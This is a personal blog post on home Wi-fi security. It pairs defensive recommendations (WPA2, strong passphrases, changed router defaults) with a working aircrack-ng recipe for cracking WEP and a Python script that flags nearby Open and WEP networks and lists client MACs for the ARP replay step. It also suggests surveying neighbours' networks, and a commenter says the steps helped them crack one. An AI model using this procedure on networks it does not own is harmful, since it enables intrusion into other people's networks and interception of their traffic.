Wi-fi Security

Disclaimer: The views expressed here are the author's alone; you may agree or disagree with any of them. The code and commands given in these posts worked fine for the author, but use them at your own risk: they may damage your system.

I have been in Pune for more than a year now and have attended countless conferences, un-conferences, camps and what not. I have learnt a lot, and at least I am now able to blog about it. At almost every event security is one of the leading topics. Is it really that big? Oh YES!!! I would like to quote Rohit's statement: "Click one centimetre below what you usually click and you would be much more secure".


With regard to Wi-fi, I have heard many speakers discourage the use of Open and WEP connections for home as well as corporate use. I fully agree, having seen the WEP crack at Club Hack 2008; I have included the steps to crack WEP later in this post.

WPA2 with 802.1X authentication is the most secure type of connection available today. For how long, nobody can say; it will be cracked some day, that is for sure, but currently it is the best we have. For home users the practical option is WPA2-PSK, and there the strength rests entirely on the passphrase: a captured four-way handshake can be attacked offline with a dictionary, so a short or guessable passphrase undoes the protection.

We have seen incidents where an attacker used an open Wi-fi to send threatening emails, and occasions where attackers stole crucial data. The problem I see is a lack of awareness among users and the desire for PLUG n PLAY devices. The trouble with PLUG n PLAY is that you get something configured very generically, and the common man does not dare to change it, i.e. does not dare to "click one centimetre below".

Personally I don't believe in PLUG n PLAY devices; if I use them, I always configure them manually. But that is not the case with the general public, so how can we ensure their security when the engineer from the ISP comes and configures the AP in Open mode? The need is to train our support persons on this. Recently I read an article saying that the police in Mumbai would help users ensure that their Wi-fi is secure. This is a very welcome step, but when will it happen in other cities? When will the government be able to issue a checklist, for home users as well as corporates, stating that if you have done a, b and c then you have done your part and can be trusted?


I strongly believe that the person coming to your home to set up the Internet connection should configure your AP with WPA2 enabled and discourage the use of Open/WEP connections. The case is just the reverse here; hopefully this will improve very soon :)


Recommendations:

  • Never use an Open/WEP connection.
  • Never use connections such as "Public Free Wi-fi"; they may be dangerous.
  • Always use a WPA or WPA2 enabled connection (WPA2 with AES/CCMP where the hardware supports it, and a long passphrase that is not a dictionary word).
  • Home users should turn off the AP when not in use.
  • Change the router's administrative password at least once a month, and please don't use admin/admin.
  • Change the default settings of your Access Point (SSID, admin password, and turn off remote administration if it is on).
  • Limit the DHCP allocation; binding addresses to MAC addresses is recommended if you have only a few machines. Treat this as housekeeping rather than protection, since a MAC address is trivially spoofed by anyone who can see your traffic.
  • Always keep a log. Many APs can send their log to a machine on the LAN (syslog), so it survives a reboot of the router.


Cracking a WEP password

Step 0 ) Use Backtrack with a supported Wi-fi card (the driver must support monitor mode and packet injection).
Step 1 ) airmon-ng start ath0
Step 2 ) airodump-ng -w capture -c 6 --bssid 00:11:22:33:44:55 ath0
Step 3 ) aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0
Step 4 ) aircrack-ng capture-01.cap

Notes: ath0 stands for the monitor-mode interface that airmon-ng reports after Step 1; the name depends on your driver, and the same interface must be used in Steps 2 and 3. 00:11:22:33:44:55 is a placeholder for the target AP's BSSID and 66:77:88:99:00:AA for the MAC of a client already associated with it; both are read from the airodump-ng screen. If no client is associated, first run aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h <your card's MAC> ath0 and then use your own MAC for -h. Steps 2 and 3 run at the same time in two terminals; run Step 4 once the #Data column in airodump-ng has reached a few tens of thousands, and re-run it as the capture grows.


A detailed guide is available at http://mtaram.wordpress.com/2008/12/25/cracking-wep-in-4-steps. Use this at your own risk; the intention is not to teach any kind of hacking but to show that WEP is very weak.
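To turn the recommendations above ("never use Open/WEP") and the WEP steps into something you can check against your own surroundings, here is an added example of mine, not code from the original post or from the aircrack-ng project. It reads the CSV file that airodump-ng writes next to the capture (capture-01.csv when you use -w capture), flags every Open or WEP network, reports how many IVs have been collected for each WEP network, and lists the clients seen talking to it, which are the MACs you would put after -h in the ARP replay step. The CSV sample is constructed for the example and is not a real capture; the figure of 40,000 IVs is a rough rule of thumb for the PTW attack from the aircrack-ng documentation and is an assumption here, not a guarantee.

```python
"""Flag weak networks in an airodump-ng CSV dump.

Added example for this post, not part of the original or of aircrack-ng.
It assumes the CSV layout airodump-ng writes with "-w capture" into
capture-01.csv: an access-point table, a blank line, then a station
table. SAMPLE_CSV below is constructed for the example, not a real capture.
"""
import csv

# Rough rule of thumb for the PTW attack (assumption taken from the
# aircrack-ng documentation): around 40,000 IVs for a good chance at a 104-bit key.
WEP_IV_RULE_OF_THUMB = 40000

# Constructed sample in the shape of an airodump-ng CSV file (not real data).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-01-10 10:00:00, 2009-01-10 10:12:00,  6,  54, WEP , WEP, , -45, 812, 41230, 0. 0. 0. 0, 8, HomeNet1,
AA:BB:CC:DD:EE:01, 2009-01-10 10:00:00, 2009-01-10 10:12:00, 11,  54, OPN , , , -60, 300, 0, 0. 0. 0. 0, 17, Public Free Wi-fi,
AA:BB:CC:DD:EE:02, 2009-01-10 10:00:00, 2009-01-10 10:12:00,  1,  54, WPA2, CCMP, PSK, -52, 450, 0, 0. 0. 0. 0, 6, Office,
AA:BB:CC:DD:EE:03, 2009-01-10 10:00:00, 2009-01-10 10:12:00,  6,  54, WPA , TKIP, PSK, -70, 200, 0, 0. 0. 0. 0, 5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:00:AA, 2009-01-10 10:01:00, 2009-01-10 10:12:00, -50, 5120, 00:11:22:33:44:55, HomeNet1
"""


def _split_sections(text):
    """airodump-ng separates the AP table from the station table with a blank line."""
    ap_lines, station_lines = [], []
    current = ap_lines
    for line in text.splitlines():
        if not line.strip():
            if ap_lines:  # first blank line after the AP table starts the station table
                current = station_lines
            continue
        current.append(line)
    return ap_lines, station_lines


def _parse_table(lines):
    """Parse one header-plus-rows table into dicts keyed by the header names.

    Fields are stripped because airodump-ng pads them; extra trailing
    fields (e.g. several probed ESSIDs) are dropped by zip().
    """
    rows = list(csv.reader(lines, skipinitialspace=True))
    if not rows:
        return []
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (c.strip() for c in row))) for row in rows[1:]]


def parse_airodump_csv(text):
    """Return (access_points, stations) from airodump-ng CSV text."""
    ap_lines, station_lines = _split_sections(text)
    return _parse_table(ap_lines), _parse_table(station_lines)


def classify(ap):
    """Return (verdict, reason) for one AP record: 'weak', 'ok' or 'unknown'."""
    privacy = ap.get("Privacy", "").upper()
    if "OPN" in privacy:
        return "weak", "open network: anyone can join and read the traffic"
    if "WEP" in privacy:
        ivs = int(ap.get("# IV") or 0)
        enough = "enough" if ivs >= WEP_IV_RULE_OF_THUMB else "not yet enough"
        return "weak", (f"WEP: {ivs} IVs captured, {enough} for a PTW attack "
                        f"(rule of thumb {WEP_IV_RULE_OF_THUMB})")
    if "WPA" in privacy:  # covers WPA, WPA2 and mixed-mode values
        return "ok", f"{privacy} ({ap.get('Cipher')}/{ap.get('Authentication')})"
    return "unknown", f"unrecognised privacy value {privacy!r}"


def audit(text):
    """Classify every AP in the dump and attach the clients seen talking to it."""
    aps, stations = parse_airodump_csv(text)
    clients = {}
    for st in stations:
        clients.setdefault(st["BSSID"], []).append(st["Station MAC"])
    findings = []
    for ap in aps:
        verdict, reason = classify(ap)
        findings.append({
            "bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": ap["channel"],
            "verdict": verdict, "reason": reason,
            # clients matter for WEP: ARP replay needs a MAC the AP already accepts
            "clients": clients.get(ap["BSSID"], []),
        })
    return findings


def report(findings):
    """Render findings as text, one line per AP plus one per associated client."""
    lines = []
    for f in findings:
        lines.append(f"[{f['verdict'].upper():7}] {f['bssid']} ch{f['channel']:>2} "
                     f"{f['essid']!r}: {f['reason']}")
        for mac in f["clients"]:
            lines.append(f"          associated client {mac}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(audit(SAMPLE_CSV)))
```

Run it against your own capture with `audit(open("capture-01.csv").read())`. The script only reads what airodump-ng already wrote, so it is safe to run on a walk around your building to see how many neighbours still sit on Open or WEP; the IV count is the same number the #Data column shows on screen and tells you how far Step 3 has got.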


3 comments

15 Jan

Besides Backtrack there are various such bootables, like Operator etc., but the tool is aircrack in most cases. It can be used in Windows too if you have the right kind of hardware. The Windows version of aircrack is available at http://www.aircrack-ng.org/doku.php?id=downloads

14 Jan

You need a tool; who develops it is not the concern. If we already have it in Backtrack, why not use it?

14 Jan

Didn't attend the conference, but your post was quite explanatory and helped me do the crack. Thanks :)
Would appreciate it if this could be cracked without the use of Backtrack.
Hope to see a script by you instead (soon) :)